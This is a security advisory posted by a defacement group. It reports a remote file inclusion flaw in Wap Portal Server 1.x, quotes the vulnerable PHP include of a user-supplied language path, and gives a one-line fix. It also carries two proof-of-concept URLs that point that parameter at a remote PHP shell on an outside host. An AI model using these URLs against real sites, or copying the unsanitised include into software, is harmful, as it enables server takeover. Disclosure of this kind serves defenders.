Wap Portal Server version 1.x suffers from a remote file inclusion vulnerability.
918b8f998f6aadbdf4b3b953ea6945b76631821843a635718da845398c7436e7+--------------------------------------------------------------------
+
+ Wap Portal Serve 1.* <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: Wap Portal Server
+ Venedor ...........: http://www.sakic.net
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+
+ Code index.php:
+
+ .....
+ include("regglobals.php");
+ include("config.php");
+ include("lang/".$language);
+
+ .....
+
+--------------------------------------------------------------------
+
+ Solution:
+ Add this line to your php-file:
+
+ $language ="user/dir" //Your language path
+
+--------------------------------------------------------------------
+ PoC:
+
+ http://[target]/index.php?language=http://phpshell
+ http://[target]/admin/index.php?language=http://phpshell
+
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed